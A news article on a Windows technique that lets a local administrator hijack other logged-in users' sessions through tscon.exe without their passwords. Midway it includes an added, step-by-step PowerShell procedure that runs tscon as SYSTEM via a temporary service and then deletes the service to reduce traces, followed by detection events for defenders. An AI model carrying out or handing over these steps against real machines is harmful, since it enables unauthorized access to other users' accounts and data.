Hacker News: Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password


You may be aware that a local Windows user with SYSTEM rights can reset the passwords of other users, but did you know that such a user can also hijack other users' sessions, including those of a domain administrator or the SYSTEM account, without knowing their passwords?

Alexander Korznikov, an Israeli security researcher, recently demonstrated that a local privileged user can hijack the session of any other logged-in Windows user, even one with higher privileges, without knowing that user's password, using only built-in command line tools.

The trick works on almost all versions of Windows and, beyond local administrator rights, requires no special privileges or external tools. Korznikov himself is unsure whether to call it a Windows feature or a security flaw.

The issue Korznikov describes is not entirely new: French security researcher Benjamin Delpy detailed a similar user session hijacking technique on his blog some six years ago.

Korznikov calls the attack "privilege escalation and session hijacking," since it lets an attacker take over a high-privileged user's session and gain unauthorized access to that user's applications and sensitive data.

For successful exploitation, an attacker needs either physical access to the targeted machine or an existing Remote Desktop Protocol (RDP) session on an already compromised machine, so the attack can be performed remotely as well.

Video Demonstrations and PoC Exploit Released!

Korznikov has also published several video demonstrations of a successful session hijack (using Task Manager, service creation, and the command line), along with a Proof-of-Concept (PoC) exploit.

Korznikov successfully tested the technique on the latest Windows 10, Windows 7, Windows Server 2008 and Windows Server 2012 R2, and another researcher confirmed on Twitter that it works on every Windows version, even when the target workstation is locked.

Microsoft does not deem it a security vulnerability, and some experts argued that a Windows user with administrative permissions can do anything anyway, but Korznikov offered a simple scenario to show how a malicious insider could misuse the behaviour:

“Some bank employee has access to the billing system and its credentials to log in. One day, he comes to work, logs into the billing system and starts to work. At lunchtime, he locks his workstation and goes out for lunch. Meanwhile, the system administrator can use this exploit to access the employee's workstation.”

“According to the bank's policy, the administrator's account should not have access to the billing system, but with a couple of built-in commands in Windows, this system administrator will hijack the employee's desktop, which he left locked. From now on, the sysadmin can perform malicious actions in the billing system as the billing employee's account.”

An attacker with the same access could alternatively dump system memory and recover users' credentials, but that is a slow and noisy process compared with simply running tscon.exe with a session number: no external tool is needed, and the only trace is the session reconnect/disconnect pair (Security events 4778 and 4779), which is recorded only if auditing of "Other Logon/Logoff Events" is enabled.
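The following is an added PowerShell walkthrough of the "service creation" variant the article describes; it is not Korznikov's published PoC. It assumes an elevated (local Administrator) prompt on the target machine, that the victim's session ID is 2 (a placeholder taken from the `query user` output), and that the service name `sesshijack` is arbitrary. `tscon.exe` normally demands the target user's password; when it runs as SYSTEM, which a service started by the Service Control Manager does by default, no password is asked for.

```powershell
# Added example (not the article's or Korznikov's own code).
# Run from an elevated PowerShell prompt on the machine whose sessions you want to list.

# 1. Enumerate interactive sessions. Columns: USERNAME, SESSIONNAME, ID, STATE, IDLE TIME, LOGON TIME.
#    A locked-and-disconnected session shows STATE "Disc"; your own session is marked with ">".
query user

# 2. Choose the victim session ID from step 1 (placeholder: 2) and the NAME of the
#    session the victim's desktop should be attached to. tscon's /dest: takes a session
#    name (e.g. "console" or "rdp-tcp#3"), which for the current session is in $env:SESSIONNAME.
$targetId = 2                      # assumption: victim's session ID from `query user`
$dest     = $env:SESSIONNAME       # attach the hijacked desktop to our own session

# 3. Running tscon directly as Administrator still prompts for the victim's password,
#    so run it as SYSTEM instead: create a service whose binary is the tscon command.
#    sc.exe (not the `sc` alias for Set-Content) needs a space after "binpath=".
$svc = 'sesshijack'                # assumption: arbitrary service name
sc.exe create $svc binpath= "cmd.exe /c tscon.exe $targetId /dest:$dest"

# 4. Start it. The SCM reports error 1053 (service did not respond) because cmd.exe is
#    not a real service, but by then tscon has already run under LocalSystem and the
#    victim's desktop is now displayed in $dest without any password having been entered.
net start $svc

# 5. Remove the service so the only remaining artefacts are event log entries.
sc.exe delete $svc
```

For defenders, the useful signals are System event 7045 / Security event 4697 (a new service installed, here with a `binpath` containing `tscon`), followed by a Security event 4778 whose reconnected session belongs to a different account than the one that was interactively logged on to that session name. Configuring a time limit that logs off, rather than merely disconnects, idle sessions shortens the window but does not help against a session that is only locked.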

Microsoft has known about the behaviour for six years, so it is likely the company does not consider it a security flaw: it requires local admin rights on the computer, and Microsoft regards this as how its operating system is supposed to behave.

Mohit Kumar - Hacking News
Entrepreneur, Hacker, Speaker, Founder and CEO — The Hacker News and The Hackers Conference.